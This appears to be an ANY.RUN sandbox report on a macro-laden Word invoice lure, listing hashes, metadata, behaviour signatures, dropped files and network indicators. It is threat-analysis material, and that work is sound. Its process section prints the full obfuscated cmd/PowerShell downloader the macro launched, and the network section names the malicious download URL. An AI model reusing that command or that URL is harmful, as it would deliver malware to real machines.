analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Facture_Num_H73082017.doc

Full analysis: https://app.any.run/tasks/27ac8b35-e713-4fdf-9a84-15867f069a0b
Verdict: Malicious activity
Analysis date: November 14, 2018, 14:04:19
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
maldoc-1
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Stella-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Nov 13 17:15:00 2018, Last Saved Time/Date: Tue Nov 13 17:15:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

D51E5344A476DFBBABD5BA8274077310

SHA1:

9B8A307A6EE90476610880E82753FC50901C4F0D

SHA256:

E3D00272C5761CDB1D439F8B4004143765AE7159C39FF45D22F0A75476D4C2FE

SSDEEP:

1536:ByJocn1kp59gxBK85fBt+a9ZR+YOMKBf+nE9KYFd1NoNrPJ+o2b79IpG4C+w:B341k/W48p+YOMKBf+nE9KYFd1NoNrPf

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 4068)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 4068)
    • Executes PowerShell scripts

      • cmd.exe (PID: 840)
  • SUSPICIOUS

    • Application launched itself

      • CMD.exe (PID: 3976)
    • Starts CMD.EXE for commands execution

      • CMD.exe (PID: 3976)
    • Creates files in the user directory

      • powershell.exe (PID: 1992)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 4068)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 4068)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: Stella-PC
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:11:13 17:15:00
ModifyDate: 2018:11:13 17:15:00
Pages: 1
Words: 2
Characters: 13
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 14
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
35
Monitored processes
4
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
4068"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Facture_Num_H73082017.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3976CMD /c C:\windOws\sYstem32\cMD /c"SeT FgWsL= iex( ( -jOiN[ReGEx]::Matches("))43]rAhc[]GnIRts[,'4Gv'(eCalper.)'f7f81a39-5f63-5b42-9efd-1f13b5431005#39;,)09]rAhc[+48]rAhc[+78]rAhc[((eCalper.)93]rAhc[]GnIRts[,)401]rAhc[+58]rAhc[+001]rAhc[((eCalper.)421]rAhc[]GnIRts[,)77]rAhc[+611]rAhc[+101]rAhc[((eCalper.)')hUdhUdnioj-]52,62,4'+'[CEPSmoC:VnEZTW (. Mte )) hUdthUd+hUdFehU'+'d+hUdlhUd+hU'+'dott'+'hGIrhUd , hUd.hUd , 4GvINVokE-'+'EXPressioN ( (hUd hUd+hUd^&( kFMhUd+hUdvehUd+hUdrhUd+hUdBOhUd+hUdSEPhUd+hUdrefEhUd+hUdRenhUd+hUdchUd+hUde.toStrING()[1,3]+hUd+hUdyboXy'+'bohUd+hUd-JOIhUd+hUdnyboybo)(NhUd+hUdew-OhUd+hUdbJ'+'hUd+hUdEct shUd+hUdySThUd+'+'hUdEm.Io.ComPResshUd+hUdIOhUd+h'+'Udn.hUd+hUddEflahUd+hUdTEShUd+hUdTrhUd+hUdeam([io.mEMOhUd+hU'+'dryhUd+hUdStrEhUd+hUdaM] hUd+h'+'Ud[SYsTEM.ConhUd+hUdvert]hUd+hUd::FhUd+hUdrombAse6hUd+hUd4STrInG(hUd+'+'hUd yboNZBdhUd+hUda8IwhUd+hUdFIb/SihUd+hUd8CUZhUd+hU'+'dzpNoYMQ0HmXKkyGUzWDX'+'a'+'TpschUd+hUdlNlhUd+hUd/UtJ2hUd+hUdWhUd+hUd/vdVnbfnfhUd+hUdXhUd+hUdjOOS/hUd+hUdK0hUd+hUd1hUd+hUdVhUd+hUdkoBnhUd+hUdbhUd+hUdbAfhUd+hUdcB2hUd+hUdvw'+'JIhUd+hUdVsriQYhUd+hUdT1Fm4wghUd+hUdLhUd+hUd7hUd+hUd900DFlRcVaAhUd+hUdI9zqcCkh'+'Ud+hUd+hUd+hUd0hUd+hUd'+'thUd+hUdXRej37ThUd+h'+'Ud5XhUd+hUd0utphUd+hUdDhUd+hUdphUd+hUdUlhUd+hUdxhUd+hUdDNVEZhUd+'+'hUdU/po1tehUd+hUdUhUd+hUdw15CXtgJRc/pa0uhUd+hUdDhUd+hUdnH/6rL6rhUd+hUdbpC3AohUd+hUdwvATmYXhUd+hUd8hUd+hUdBCra5ncv4'+'CjRhUd+hUdNh'+'Ud+hUdQzihUd+hUdThUd+hUdZitLBYczohYxhUd+hUdT9ZfGpN3158ww'+'hUd+hUdDM8'+'pGhThUd+hUdyyhUd+hUdAK8OTuhUd+hUdAVPkFhUd+hUdrsIgamhUd+hUdnhUd+hUdHrQb4'+'hUd+hUdWhUd+hUd88OhUd+hUduUhUd+hUdjhUd+hUdTOAXMN3afihUd'+'+hUdEXA3ThUd+hUd8NIhUd+hUdE0'+'whUd+hUdenlYevhUd+hUdLQ4v6asizbYhUd'+'+hUdyyLH+RChUd+hUdshUd+hUd7MTXASDhUd+hUdmh'+'Ud+hUdlialvAh'+'Ud+hUdOOhUd+hUdml5hUd+hUd'+'wnhUd+hUdNek9BO8hUd+hUd48FhUd+hUd23hUd+hUdX/QE=hUd+hUdybo ) , [IOhUd+hUd.cOmhUd+hUdpRhUd+hUdEhUd+hUdshUd+hUdsIhUd+hUdOn.CoMPrhUd+hUdESsIONMOde]::deChUd+hUdOMphUd+hUdrESS ) hUd+hUduaw FoReachUd+hUdh{ NhUd+hUdew-hUd+hUdObJ'+'EhUd+hUdct iO.StRhUd+hUdeAmrEaDER(h'+'Ud+hUdkFhUd+hUdMhUd+hUd_ ,[syhUd+hUd'+'STEhUd+hUdmhUd+hUd.TExT.ENhUd+hUdcOdi'+'ng]:hUd+hUd:AshU'+'d+hUdciI )hUd+hUd} ).rehUd+hUdADthUd+hUdOEhUd+hUdnd() hUd).ReplACe(hUdkFMhUd,[stRINg][cHAR]36).Re'+'plACe(hUdybohUd,[stRINg][cHA'+'R]39).ReplACe(hUduawhUd,[stRINg][cHAR]124)) 4Gv(seHCTAm::]XEgEr[nIOj- ( '( ( )'x'+]31[DilleHs$+]1[diLlehS$ ( ^&", '.' ,'RIGHtToLeFt') )) && poWERsheLl SET-IteM VaRIABle:Z37 ( [tyPe]( \"{0}{1}{2}\" -F 'eNvi','RoN','meNt') ) ; ( ( dIR varIABLE:z37 ).\"val`UE\"::( \"{4}{1}{3}{0}{2}\" -f 'Ia','TenViR','bLe','ONMeNtVar','GE').Invoke((\"{1}{0}\" -f'l','Fgws'),(\"{1}{0}{2}\"-f 'eS','PRoc','S') ) ) ^| ^& ( \"{0}{1}\" -f 'iE','X')" C:\Windows\system32\CMD.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
840C:\windOws\sYstem32\cMD /c"SeT FgWsL= iex( ( -jOiN[ReGEx]::Matches("))43]rAhc[]GnIRts[,'4Gv'(eCalper.)'f7f81a39-5f63-5b42-9efd-1f13b5431005#39;,)09]rAhc[+48]rAhc[+78]rAhc[((eCalper.)93]rAhc[]GnIRts[,)401]rAhc[+58]rAhc[+001]rAhc[((eCalper.)421]rAhc[]GnIRts[,)77]rAhc[+611]rAhc[+101]rAhc[((eCalper.)')hUdhUdnioj-]52,62,4'+'[CEPSmoC:VnEZTW (. Mte )) hUdthUd+hUdFehU'+'d+hUdlhUd+hU'+'dott'+'hGIrhUd , hUd.hUd , 4GvINVokE-'+'EXPressioN ( (hUd hUd+hUd&( kFMhUd+hUdvehUd+hUdrhUd+hUdBOhUd+hUdSEPhUd+hUdrefEhUd+hUdRenhUd+hUdchUd+hUde.toStrING()[1,3]+hUd+hUdyboXy'+'bohUd+hUd-JOIhUd+hUdnyboybo)(NhUd+hUdew-OhUd+hUdbJ'+'hUd+hUdEct shUd+hUdySThUd+'+'hUdEm.Io.ComPResshUd+hUdIOhUd+h'+'Udn.hUd+hUddEflahUd+hUdTEShUd+hUdTrhUd+hUdeam([io.mEMOhUd+hU'+'dryhUd+hUdStrEhUd+hUdaM] hUd+h'+'Ud[SYsTEM.ConhUd+hUdvert]hUd+hUd::FhUd+hUdrombAse6hUd+hUd4STrInG(hUd+'+'hUd yboNZBdhUd+hUda8IwhUd+hUdFIb/SihUd+hUd8CUZhUd+hU'+'dzpNoYMQ0HmXKkyGUzWDX'+'a'+'TpschUd+hUdlNlhUd+hUd/UtJ2hUd+hUdWhUd+hUd/vdVnbfnfhUd+hUdXhUd+hUdjOOS/hUd+hUdK0hUd+hUd1hUd+hUdVhUd+hUdkoBnhUd+hUdbhUd+hUdbAfhUd+hUdcB2hUd+hUdvw'+'JIhUd+hUdVsriQYhUd+hUdT1Fm4wghUd+hUdLhUd+hUd7hUd+hUd900DFlRcVaAhUd+hUdI9zqcCkh'+'Ud+hUd+hUd+hUd0hUd+hUd'+'thUd+hUdXRej37ThUd+h'+'Ud5XhUd+hUd0utphUd+hUdDhUd+hUdphUd+hUdUlhUd+hUdxhUd+hUdDNVEZhUd+'+'hUdU/po1tehUd+hUdUhUd+hUdw15CXtgJRc/pa0uhUd+hUdDhUd+hUdnH/6rL6rhUd+hUdbpC3AohUd+hUdwvATmYXhUd+hUd8hUd+hUdBCra5ncv4'+'CjRhUd+hUdNh'+'Ud+hUdQzihUd+hUdThUd+hUdZitLBYczohYxhUd+hUdT9ZfGpN3158ww'+'hUd+hUdDM8'+'pGhThUd+hUdyyhUd+hUdAK8OTuhUd+hUdAVPkFhUd+hUdrsIgamhUd+hUdnhUd+hUdHrQb4'+'hUd+hUdWhUd+hUd88OhUd+hUduUhUd+hUdjhUd+hUdTOAXMN3afihUd'+'+hUdEXA3ThUd+hUd8NIhUd+hUdE0'+'whUd+hUdenlYevhUd+hUdLQ4v6asizbYhUd'+'+hUdyyLH+RChUd+hUdshUd+hUd7MTXASDhUd+hUdmh'+'Ud+hUdlialvAh'+'Ud+hUdOOhUd+hUdml5hUd+hUd'+'wnhUd+hUdNek9BO8hUd+hUd48FhUd+hUd23hUd+hUdX/QE=hUd+hUdybo ) , [IOhUd+hUd.cOmhUd+hUdpRhUd+hUdEhUd+hUdshUd+hUdsIhUd+hUdOn.CoMPrhUd+hUdESsIONMOde]::deChUd+hUdOMphUd+hUdrESS ) hUd+hUduaw FoReachUd+hUdh{ NhUd+hUdew-hUd+hUdObJ'+'EhUd+hUdct iO.StRhUd+hUdeAmrEaDER(h'+'Ud+hUdkFhUd+hUdMhUd+hUd_ ,[syhUd+hUd'+'STEhUd+hUdmhUd+hUd.TExT.ENhUd+hUdcOdi'+'ng]:hUd+hUd:AshU'+'d+hUdciI )hUd+hUd} ).rehUd+hUdADthUd+hUdOEhUd+hUdnd() hUd).ReplACe(hUdkFMhUd,[stRINg][cHAR]36).Re'+'plACe(hUdybohUd,[stRINg][cHA'+'R]39).ReplACe(hUduawhUd,[stRINg][cHAR]124)) 4Gv(seHCTAm::]XEgEr[nIOj- ( '( ( )'x'+]31[DilleHs$+]1[diLlehS$ ( &", '.' ,'RIGHtToLeFt') )) && poWERsheLl SET-IteM VaRIABle:Z37 ( [tyPe]( \"{0}{1}{2}\" -F 'eNvi','RoN','meNt') ) ; ( ( dIR varIABLE:z37 ).\"val`UE\"::( \"{4}{1}{3}{0}{2}\" -f 'Ia','TenViR','bLe','ONMeNtVar','GE').Invoke((\"{1}{0}\" -f'l','Fgws'),(\"{1}{0}{2}\"-f 'eS','PRoc','S') ) ) ^| ^& ( \"{0}{1}\" -f 'iE','X')"C:\windOws\sYstem32\cmd.exeCMD.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
1992poWERsheLl SET-IteM VaRIABle:Z37 ( [tyPe]( \"{0}{1}{2}\" -F 'eNvi','RoN','meNt') ) ; ( ( dIR varIABLE:z37 ).\"val`UE\"::( \"{4}{1}{3}{0}{2}\" -f 'Ia','TenViR','bLe','ONMeNtVar','GE').Invoke((\"{1}{0}\" -f'l','Fgws'),(\"{1}{0}{2}\"-f 'eS','PRoc','S') ) ) | & ( \"{0}{1}\" -f 'iE','X')C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 310
Read events
915
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
4068WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR972A.tmp.cvr
MD5:
SHA256:
1992powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1QJ9HSM6IETWAXQTKV6R.temp
MD5:
SHA256:
1992powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
1992powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5da2e2.TMPbinary
MD5:3C6A7AAE234382390B6B52F47ECA1BAA
SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2
4068WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$cture_Num_H73082017.docpgc
MD5:7524C2FD0B19E73A377C1C29058816CE
SHA256:D59686C91BD88948D2672CBED7EDD8ED64B16773208DD4708955B58F38D5A873
4068WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:4DF4C5D23E5B090792E950F8D8189192
SHA256:0C8B62A66B22C3B91B327853AB2B92C02A783BF61375CD71C01A5E4F1CD41237
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
1
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1992
powershell.exe
GET
204.152.208.130:80
http://akucakep.com/JhVWKzotm
US
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1992
powershell.exe
204.152.208.130:80
akucakep.com
QuadraNet, Inc
US
suspicious

DNS requests

Domain
IP
Reputation
akucakep.com
  • 204.152.208.130
malicious

Threats

No threats detected
No debug info